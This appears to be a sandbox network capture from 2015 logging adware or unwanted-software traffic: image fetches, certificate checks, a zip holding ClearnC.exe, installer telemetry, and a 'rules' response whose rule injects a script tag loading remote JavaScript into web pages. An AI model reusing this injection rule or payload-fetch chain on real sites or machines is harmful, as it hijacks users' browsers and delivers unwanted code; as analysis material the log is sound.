.*.....ZYne..3....jR...!.#I1?.H..5..v..T.KSl...Rz...r.W.......m\|...C.'.`.#.f.......A(B..P@(B...E(B...E(B.....f&Y:.j..-G......3.&...i...s.G.l.a;...%].j.V.j.....h"..5.......IEND.B`.....
<<< skipped >>>
GET /img/Sihehihi/Sihehihi_31_03_15.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: img.beyabir.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Thu, 30 Apr 2015 23:07:08 GMT
Content-Type: image/png
Content-Length: 7421
Connection: keep-alive
x-amz-id-2: tb3wzOqbdaXKpKNL10W0GD7quW/G8dQsROYO1ZNZx4BSp/ WOCV6IN Tr7fFpLso
x-amz-request-id: 1A430C7BD6E060DF
x-amz-version-id: fwDsegYHRL0JOsa1HMn_zrCAJNbvgq_T
x-amz-meta-cb-modifiedtime: Tue, 31 Mar 2015 09:00:45 GMT
Last-Modified: Tue, 31 Mar 2015 09:01:01 GMT
ETag: "99901d117a18376c2cf58e46fe682679"
Accept-Ranges: bytes
.PNG........IHDR.......9......K......sRGB.........gAMA......a.....pHYs..........o.d....tEXtSoftware.Paint.NET v3.5.11G.B7...lIDATx^...X....g.....b..N.5.....5v.5F....X...a..PA.."..XQ)..H...T.....{..C.FE...7...<.gfN.a....sfXN!.....O...E'..d?rW.A.....2.y.."........)m. .wm...!.]....).n.y;g!kb..&.!kr....).....Y3..53...}.=...K. {.jd.j)VWH..%..UC...H......8b......!G..R$v.!n.:!.YClF!....o........@...C...b.B...M!yc.....zS.^.-RG=G.w@....2.L....Z........JbSo).G.$,....-.qWELV.s... ...[......4.r......d.5Qt["/...$..m 6..R..O....1}.sL:...~..o.LH..E..7..[y..".pg.;gpB.k-!.."...".....r.{C.i...*...Px.^.<~...r##..^`.$..z......t......S..]K.0.9..z...?]......J.7."xNX"...*\..L.2..`?PZ./O&c.5C...xa,..W........`]d_...8.\R. ...{...n<.u..........9...ptD.:.m..>..f....j..*........`S7\5...w....$.O~qGn.i......3.v....%d[.B|.R......@[...B.....y$;.....;.).......h...C!....6"..-...c...O...!..(.m0........y.p..J.i..;k.....Y.M/..a.<....g.4.kI...8C.O.".C.1'x.]QGXl.. Y.....<Dc<D.Jy..B8..N..z..*.o....D.:......]O..i@~.kb..VF(.].Y.5.j...k...<l..q.@L.x...Gu.~^..;y.Fh.Wh...#..>...J`....:....(.7...V..,!.........]p.G)..`.l.....d..!s.6./.@.V..Bk.a..."O !..J.h .....<vyH...Af...*.Y...e.......K>"........i.x....8..]Kp..p.fqe[....,;".{#.-.B.....5P..&.H-2O-....f.D...m)..e.R$..pu..%.x.......o|....T..}N'.F.....B.H...M...y..P.K..Y...-...4.;lDaP......X.....c..dW%.{)#.......8H.%...G.Bx.......I6........ .8..p.)p.....D.J..C.?........4..O8.w..`?.(..-.........p.SY..|.lZ.....6V.n.y.^.#......b.8<?.#..G...9.%(....U..4#..D.Z.c.).G.x\-.p....Y..
<<< skipped >>>
GET /img/Rerarapepe/logo_new.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: img.beyabir.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Thu, 30 Apr 2015 23:07:08 GMT
Content-Type: image/png
Content-Length: 4569
Connection: keep-alive
x-amz-id-2: i8ICCXz5aRAGTe6TbJWncaksmnn7Nf o0zWa6P1Emvu b2naXV5VqYrZ44fl/JsT
x-amz-request-id: F053A26F739ABFD6
x-amz-meta-s3fox-filesize: 4569
x-amz-meta-s3fox-modifiedtime: 1388397217065
Last-Modified: Mon, 30 Dec 2013 09:53:59 GMT
x-amz-version-id: FBdIFQNqjG8fAIwxlMklzjPUXqz3Asib
ETag: "3263ff057b8e7380f7579d5aaab2bfdc"
Accept-Ranges: bytes
.PNG........IHDR...2...2......?......tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:2A43320D713811E3B459B11FBD9400CD" xmpMM:DocumentID="xmp.did:2A43320E713811E3B459B11FBD9400CD"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:2A43320B713811E3B459B11FBD9400CD" stRef:documentID="xmp.did:2A43320C713811E3B459B11FBD9400CD"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>v.Gr...MIDATx..Z{p\U......$.l.6M.jc..P....T.N.*3.80`...:#.......3>...F..|...3>..hE..(...P-i..y7.$....{.=..w......6)...~.....~..;.PJ.....ur.n.......O|.&...hj&.H.e2$l..y.T*...D.3E.#.A -^t.....TzA-....P.N..i.'.........T..z>.GT.%r........"..H9....R...I......}..@.^../..?o.U...F..c.qA.H.?A.(a.....k....,.!Vb.......:58.K...@z>K[.......S_....T.......... lr......GU..~.....C......t24;f.M.R%...4......`............%..aZ`.... ..@..v...T.L.l9....R.M-0.&0^.`v. u....?Y....e..%.."ik..^....s.}.~.8Iu..?........m...{ix.KM..........,4R..........FF..W@......o.7]p!%Z..f.$k......hB.......DK...R.&..k..%#e.
<<< skipped >>>
GET /img/Rerarapepe/Rerarapepe.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: img.beyabir.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Thu, 30 Apr 2015 23:07:08 GMT
Content-Type: image/png
Content-Length: 3657
Connection: keep-alive
x-amz-id-2: Z0jI9oUtCmkwjhrm4fpr7I34XCbbJafI4wdwaCXRwxEFhVvEbJ9HB6a84y2LlhS6
x-amz-request-id: 6ABD9C086DAAC9E3
x-amz-meta-s3fox-filesize: 3657
x-amz-meta-s3fox-modifiedtime: 1402226184727
Last-Modified: Mon, 09 Jun 2014 14:19:41 GMT
x-amz-version-id: nXvqG1jeKyMVMqgSg3LnBI1CMsSqJwdV
ETag: "e568d92e622a3ac2f573a98d91df1421"
Accept-Ranges: bytes
.PNG........IHDR.......!.............tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:2D84B53BEEFE11E39491D45C0DAE79C8" xmpMM:DocumentID="xmp.did:2D84B53CEEFE11E39491D45C0DAE79C8"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:2D84B539EEFE11E39491D45C0DAE79C8" stRef:documentID="xmp.did:2D84B53AEEFE11E39491D45C0DAE79C8"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..(.....IDATx..Wi....~U.=....].7.5..l.@..1v...Vb..`..H8.\..D. Q.EA.....Q8..cB.c....&vv}a........3;..]..z...(%..LMu......^3..1"...mr.. ..b...z.B.\.<]!...8...J.~.R.^.U....ArE...q...QW......W.. M..l......R..Dd."...P......F..-.....S...S... .OF...I./.N.&e6.....TW.c....z......@.......`_.X'...X8.3op.'...z&.UT.m...r4:.1.'&.1F....9....Fr&..U...d......<..Z.Q.^.}]X.......D!......73.a.8.....Q..c.w...).^U#..L3..}m......:.z..NN...r.Y..Ck..E}..-....t1..?g..d..t.E:4x.*#....L...(wv..~.OY.......wfO.L.0....4...Ko........h. s6M\.D....$.....W......6g...............>x....<..[...F"5C..=K.....[v...O'..ky
<<< skipped >>>
GET /pki/crl/products/WinPCA.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: crl.microsoft.com
HTTP/1.1 200 OK
Content-Type: application/pkix-crl
Last-Modified: Sat, 07 Mar 2015 06:01:44 GMT
Accept-Ranges: bytes
ETag: "dde36a309c58d01:0"
Server: Microsoft-IIS/8.0
VTag: 43879645100000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Content-Length: 561
Cache-Control: max-age=900
Date: Thu, 30 Apr 2015 23:11:16 GMT
Connection: keep-alive
0..-0......0...*.H........0..1.0...U....US1.0...U....Washington1.0...U....Redmond1.0...U....Microsoft Corporation1 0)..U..."Microsoft Windows Verification PCA..150306223202Z..150605105201Z._0]0...U.#..0.......p............<.J0... .....7.......0...U......40... .....7......150604224201Z0...*.H.............4......n[.t........'....Dx.P3R.!3.|D.6vL.."k..9'....L..k......e.4......._..N..TJ......N.fP...H.....8...TJA...fGA.e...^"{../...H?..E.Y.U....h..0/.......d...6..K..V?QM...{..h.....{.3...v.....\~.7n..5..'..k.Ia.YL..LP.b....._7.V..%......z*$q..Y..f.b..L8<~..v.w....
GET /pki/crl/products/MicrosoftTimeStampPCA.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: crl.microsoft.com
HTTP/1.1 200 OK
Content-Type: application/pkix-crl
Last-Modified: Thu, 05 Mar 2015 06:01:35 GMT
Accept-Ranges: bytes
ETag: "cf2633d6957d01:0"
Server: Microsoft-IIS/8.0
VTag: 43853244400000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Content-Length: 550
Cache-Control: max-age=900
Date: Thu, 30 Apr 2015 23:11:16 GMT
Connection: keep-alive
0.."0......0...*.H........0w1.0...U....US1.0...U....Washington1.0...U....Redmond1.0...U....Microsoft Corporation1!0...U....Microsoft Time-Stamp PCA..150304221607Z..150603103607Z._0]0...U.#..0...#4..RFp..@.v.. ..5..0... .....7.......0...U......20... .....7......150602222607Z0...*.H.............Y..}y`....T.Z..`B<..I.N..O... E:....7......a..).........._|W5laoqi(..>t~.."...&`.._.7J...:..{bO_Kyi...R...!...B.s..I.c&j...(I\.S{._;@B...[i.e.[."...R` \...........M^k.=q[.V...9y..G.1o#k3<.W.......H.$>}...U...2qyd2|b.fB.....r....H.P...;....Q...b......5%.P.#..
GET /?gfe_rd=cr&ei=qLVCVZ3BLteDNJmBgQg HTTP/1.1
Host: VVV.google.com.ua
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 302 Found
Location: hXXps://VVV.google.com.ua/?gfe_rd=cr&ei=qLVCVZ3BLteDNJmBgQg&gws_rd=ssl
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=51f9c94f4cfe29d4:FF=0:TM=1430435240:LM=1430435240:S=g94WORl29EpjfH1w; expires=Sat, 29-Apr-2017 23:07:20 GMT; path=/; domain=.google.com.ua
Set-Cookie: NID=67=qdoOTsxHIBtzTljMGdrpSFmRCtEgqqpaqGd7TQCsWjdJn2cW0q0YIqjLKJ0KLzJVLGIWtQmLiygzoNGFC7PcavEgBZ0BXopqy-HiWAZ0-35cuvO-QET6X7KCnu_zeje-; expires=Fri, 30-Oct-2015 23:07:20 GMT; path=/; domain=.google.com.ua; HttpOnly
P3P: CP="This is not a P3P policy! See hXXp://VVV.google.com/support/accounts/bin/answer.py?hl=en&answer=151657 for more info."
Date: Thu, 30 Apr 2015 23:07:20 GMT
Server: gws
Content-Length: 275
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Alternate-Protocol: 80:quic,p=1
<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">.<TITLE>302 Moved</TITLE></HEAD><BODY>.<H1>302 Moved</H1>.The document has moved.<A HREF="hXXps://VVV.google.com.ua/?gfe_rd=cr&ei=qLVCVZ3BLteDNJmBgQg&gws_rd=ssl">here</A>...</BODY></HTML>..HTTP/1.1 302 Found..Location: hXXps://VVV.google.com.ua/?gfe_rd=cr&ei=qLVCVZ3BLteDNJmBgQg&gws_rd=ssl..Cache-Control: private..Content-Type: text/html; charset=UTF-8..Set-Cookie: PREF=ID=51f9c94f4cfe29d4:FF=0:TM=1430435240:LM=1430435240:S=g94WORl29EpjfH1w; expires=Sat, 29-Apr-2017 23:07:20 GMT; path=/; domain=.google.com.ua..Set-Cookie: NID=67=qdoOTsxHIBtzTljMGdrpSFmRCtEgqqpaqGd7TQCsWjdJn2cW0q0YIqjLKJ0KLzJVLGIWtQmLiygzoNGFC7PcavEgBZ0BXopqy-HiWAZ0-35cuvO-QET6X7KCnu_zeje-; expires=Fri, 30-Oct-2015 23:07:20 GMT; path=/; domain=.google.com.ua; HttpOnly..P3P: CP="This is not a P3P policy! See hXXp://VVV.google.com/support/accounts/bin/answer.py?hl=en&answer=151657 for more info."..Date: Thu, 30 Apr 2015 23:07:20 GMT..Server: gws..Content-Length: 275..X-XSS-Protection: 1; mode=block..X-Frame-Options: SAMEORIGIN..Alternate-Protocol: 80:quic,p=1..<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">.<TITLE>302 Moved</TITLE></HEAD><BODY>.<H1>302 Moved</H1>.The document has moved.<A HREF="hXXps://VVV.google.com.ua/?gfe_rd=cr&ei=qLVCVZ3BLteDNJmBgQg&gws_rd=ssl">here</A>...</BOD
<<< skipped >>>
HEAD /ofr/isicicc2.7.cis HTTP/1.1
Accept: */*
Host: cdneu.beyabir.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 30 Apr 2015 23:07:08 GMT
Content-Type: application/x-unknown-content-type
Content-Length: 385602
Connection: keep-alive
x-amz-id-2: mDcW82ox1HV Qa5CQlP7ax9z1LW NDusKLRqtoehnaXwvwv0/IvYJi gOiCMPvPQhpv51Gzogaw=
x-amz-request-id: 2863C8C2B1E22044
x-amz-version-id: YbU94Nse0oZofhTi2ZOIzFEKvuh9AniM
x-amz-meta-s3fox-modifiedtime: 1424088160999
x-amz-meta-s3fox-filesize: 385602
Last-Modified: Mon, 16 Feb 2015 12:09:44 GMT
ETag: "83fc375cf199ed35bd27a27f506b831f"
Accept-Ranges: bytes
HTTP/1.1 200 OK..Server: nginx/1.6.2..Date: Thu, 30 Apr 2015 23:07:08 GMT..Content-Type: application/x-unknown-content-type..Content-Length: 385602..Connection: keep-alive..x-amz-id-2: mDcW82ox1HV Qa5CQlP7ax9z1LW NDusKLRqtoehnaXwvwv0/IvYJi gOiCMPvPQhpv51Gzogaw=..x-amz-request-id: 2863C8C2B1E22044..x-amz-version-id: YbU94Nse0oZofhTi2ZOIzFEKvuh9AniM..x-amz-meta-s3fox-modifiedtime: 1424088160999..x-amz-meta-s3fox-filesize: 385602..Last-Modified: Mon, 16 Feb 2015 12:09:44 GMT..ETag: "83fc375cf199ed35bd27a27f506b831f"..Accept-Ranges: bytes..HTTP/1.1 206 Partial Content..Server: nginx/1.6.2..Date: Thu, 30 Apr 2015 23:07:10 GMT..Content-Type: application/x-unknown-content-type..Content-Length: 180802..Connection: keep-alive..x-amz-id-2: mDcW82ox1HV Qa5CQlP7ax9z1LW NDusKLRqtoehnaXwvwv0/IvYJi gOiCMPvPQhpv51Gzogaw=..x-amz-request-id: 2863C8C2B1E22044..x-amz-version-id: YbU94Nse0oZofhTi2ZOIzFEKvuh9AniM..x-amz-meta-s3fox-modifiedtime: 1424088160999..x-amz-meta-s3fox-filesize: 385602..Last-Modified: Mon, 16 Feb 2015 12:09:44 GMT..ETag: "83fc375cf199ed35bd27a27f506b831f"..Content-Range: bytes 204800-385601/385602.. .(.....Y_...u9.o....)...d..Q.........n.....W.~..D...A..^........$ t../....<..$..H..Md^#......m....-.z{..B?$...K.n:hL......'..%....E..;..e..H.U........M..2.R}......H......#...U!.`.C..m._.........n.....E...^.......-54. ..I.Y...tRQ....o?.....H..@|h.......&... F..."........L....Q.gn.1....!..LS..............:.Q.)n...%..Cn2.d..N.....Z.;.L..]..gy..if,.D4=..=....;,].>....Ln...O..1......4.H...g/3.;P..Edh..'<l....2
<<< skipped >>>
GET /ofr/isicicc2.7.cis HTTP/1.1
Range: bytes=102400-204799
Accept: */*
Host: cdneu.beyabir.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Connection: Keep-Alive
<<< skipped >>>
GET /3517/2 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.ejpkwz.cc
Connection: Keep-Alive
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 01 May 2015 01:05:37 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.2.14p1
Location: hXXp://VVV.ejpkwz.cc/files/zip_r3/3517_89d09a830004d94b9f646d24de15e7f2/2.zip
0......
GET /files/zip_r3/3517_89d09a830004d94b9f646d24de15e7f2/2.zip HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.ejpkwz.cc
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 01 May 2015 01:05:38 GMT
Content-Type: application/zip
Content-Length: 3016484
Last-Modified: Tue, 28 Apr 2015 10:21:26 GMT
Connection: keep-alive
Accept-Ranges: bytes
PK........}*.F.4.k5...0.......479.db.0...!..........<..A#.U......L........* ...i.AU%......k.1...o4...MX*.8.D.].J.. ..f.q.oV.Q7..c..%!u..>..2.He.}.tod.Z..^B...ru-2(.........`h`.}...|g*..g...R.gcsw(.xa..x.v.C.]O $.".........3......4.........b...1Y8E. L........v.n..3.^B...ru-w.......c^.0......q|.".2.l..........iU.Z.....K.|..F.1...........Hov43E3fPK.........).F.U..............ClearnC.exe...`...8.?.#..6......HP4.....4.l.J`C`C.I@....1y..J ..j..U.j..W.\lK[o..U.Vt..$(..\.B...N.Tc.. .y.9..f....}.......=...9sf...33...-..A0.QUA8$......u..u..F......C......bC...z....6.....i.h{..V-m.m.d.Z.o.........T-....:.\....i....7.|....>........uP...........M..[;.'................!u.M..........~...n.....F.k.v. ..:..C....".....a#0......P...N..]...:.......e..m....}w.....".I......r..l......u.:H.!........|3n....g.O=....Bwe..m.5....:^g.........*7C...r..Y.._.n....._.[..x...C.P.....3cO.>S......w....s.{.K..r..pU.^.).sO.:.......PG*.9O..&A..*..\.V'Q....&...`9..H.[.'b4.bk./NY.......gW.x.!.y.r...4.t.Sr......V_Ab..X..S>..jN..I..h.. s<:.KM2B>J...4J...I.|v..B..=......$3.A9R..*....H......jR...=dP.c...H..H..n.m......~4dS..g.1t......N...!.o.r.O\.[..b...n5...5....~.E.. ...>.^".1S.HU:.~|.|.mTZ..s...L...x...k.#...._....?h.......i..7.>..t................R..=.......b]..z...W...h!.'.O.U.....Mk....=\...CN....~ .5)...~..Gg.0.x...........8>.!*....N.y..O..j%0.......Vh{.l..O..... `..RM..t.P..6....u.......;...r.0\j...`2F.CC..... ..E.......9......ao .GL......<br.j..Y....N.e..,?Jt;I.I..W~A.V._...Gl..q;&..M=.5....M./.<...)&...W.>..
<<< skipped >>>
GET //MEowSDBGMEQwQjAJBgUrDgMCGgUABBS2CA1fbGt26xPkOKX4ZguoUjM0TgQUQMK9J47MNIMwojPX+2yz8LQsgM4CCQCRRRvT8MWO4g== HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.godaddy.com
HTTP/1.1 200 OK
Date: Thu, 30 Apr 2015 23:11:56 GMT
Server: Apache
Content-Transfer-Encoding: Binary
Cache-Control: max-age=120183, public, no-transform, must-revalidate
Last-Modified: Thu, 30 Apr 2015 22:20:25 GMT
Expires: Sat, 02 May 2015 10:20:25 GMT
ETag: "d08b003f15d07cc5bfc23c2479efc8bedd8da485"
Content-Length: 1788
Connection: close
Content-Type: application/ocsp-response
0..........0..... .....0......0...0...z0x1.0...U....US1.0...U....Arizona1.0...U....Scottsdale1.0...U....GoDaddy Inc.1 0)..U..."Go Daddy Validation Authority - G2..20150430222025Z0l0j0B0... ..........._lkv...8..f..R34N..@..'..4.0.3..l...,......E..........20150430222025Z....20150502102025Z0...*.H..............\.{...I...8P.q]..q6.a_.n#.......4.)Y.vn.3..tV..%ZYn..(.?.....@X\..).XeA/. ..v..7.~...R..c.F. ..........!...nI.=`...C..v......A...H..S.x..........4.AEw,..1.....!=..U&...t......Ii..A..p)....N0{..Z..L...M>t...m......^...y.....^*.E..2NG..p.>NH.H.....6.j....z.....0...0...0..........,.z.Hl..0...*.H........0..1.0...U....US1.0...U....Arizona1.0...U....Scottsdale1.0...U....GoDaddy.com, Inc.1-0 ..U...$hXXp://certs.godaddy.com/repository/1301..U...*Go Daddy Secure Certificate Authority - G20...150316070000Z..160316070000Z0x1.0...U....US1.0...U....Arizona1.0...U....Scottsdale1.0...U....GoDaddy Inc.1 0)..U..."Go Daddy Validation Authority - G20.."0...*.H.............0.........xo(....QQ.`L.~...&...a.F.=.....d=....."......?...\..........b.D....l=.HS.N......A..;....C)...(..T........XA-N....k1 .....ag...,4.L{.I..hEKb..K......!.(...7....p.O...X.._........8.B..k[4...........e.../....^.S..7A.b.oB..\......2%.|c...A....Fk.T..24.0B...p..........0...0...U.......0.0...U...........0...U.%..0... ......... .......0...U.......O........f...e..r..0... .....0......0L..U...E0C0A.?.=.;hXXp://crl.godaddy.com/repository/mastergodaddy2issuing.crl0J..U. .C0A0?..`.H...m....000... ........"hXXp://crl.godaddy.com/repository/0...*.H...........
<<< skipped >>>
GET /services/stores?dummy=593 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.related.deals
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 30 Apr 2015 23:07:22 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
P3P: CP="Potato"
X-Cache: MISS
X-Server: Provided by Intermedia
X-Country: UA
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
Access-Control-Allow-Credentials: true
Content-Encoding: gzip
14b............mRAr. ...1.'.8.[..6.v_.%-....#....R..r[.Q'D.{..z.....Q...U..8..\...I.MN!.-.... .H@.Md.<z[...:cg\....Y.lh..l...{%../H.|..aT..l...;?-...k..UO.BMw)C.f..*..Q..bu.!.I.5...!.....y.HY.......... H.7..2.NX)g..$lxp....A..J/D..R..$...0...J.!R.K.D~.D.l.V..E.v4..-..P$.....R.BE...<.(*..;.....5..e.......8........9.g......O..4_].he......0......
GET /services/rules?dummy=865 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.related.deals
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 30 Apr 2015 23:07:22 GMT
Content-Type: text/plain
Content-Length: 265
Connection: keep-alive
Last-Modified: Fri, 06 Feb 2015 21:11:55 GMT
ETag: "5d60ef-109-50e71dec37cc0"
Cache-Control: max-age=600
Expires: Thu, 30 Apr 2015 23:17:22 GMT
P3P: CP="Potato"
X-Cache: MISS
X-Server: Provided by Intermedia
X-Country: UA
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
Access-Control-Allow-Credentials: true
Accept-Ranges: bytes
</body>|<script>var cb_instID='{instID}';cbS=document.createElement("script");cbS.setAttribute("type","text/javascript");cbS.setAttribute("src", "hXXp://related.deals/services/load.js");document.body.appendChild(cbS);</script></body>.{cashReminder_instID}|{instID}.....
GET /services/update/1.0.0/Oe7hZG4iL2THGzzgTyPL5m0uORXCQUea/677 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.related.deals
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 30 Apr 2015 23:07:22 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
P3P: CP="Potato"
X-Cache: BYPASS
X-Server: Provided by Intermedia
X-Country: UA
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
Access-Control-Allow-Credentials: true
HTTP/1.1 200 OK..Server: nginx/1.6.2..Date: Thu, 30 Apr 2015 23:07:22 GMT..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..P3P: CP="Potato"..X-Cache: BYPASS..X-Server: Provided by Intermedia..X-Country: UA..Access-Control-Allow-Origin: *..Access-Control-Allow-Headers: X-Requested-With..Access-Control-Allow-Credentials: true..
GET /v4/sof-installer/535559167_198339_B48A115F?action=pcm.installer.istartsurf.ds HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926
Host: xa.xingcloud.com
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 30 Apr 2015 23:07:20 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48..{"stats":"ok","time":"0.62 ms","message":"store 1 action and 0 update "}..0..HTTP/1.1 200 OK..Server: nginx/0.7.67..Date: Thu, 30 Apr 2015 23:07:20 GMT..Content-Type: text/html; charset=utf-8..Transfer-Encoding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.3.3..xa-api-version: v4..48..{"stats":"ok","time":"0.62 ms","message":"store 1 action and 0 update "}..0......
GET /v4/sof-installer/535559167_198339_B48A115F?action=pcm.installer.istartsurf.finish HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926
Host: xa.xingcloud.com
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 30 Apr 2015 23:07:25 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
4a..{"stats":"ok","time":"262.11 ms","message":"store 1 action and 0 update "}..0..
POST /YBRInternet/?v=5.0&c=1840466908 HTTP/1.1
Accept: */*
Host: os.beyabir.com
User-Agent: ICAS
Content-Length: 1404
Cache-Control: no-cache
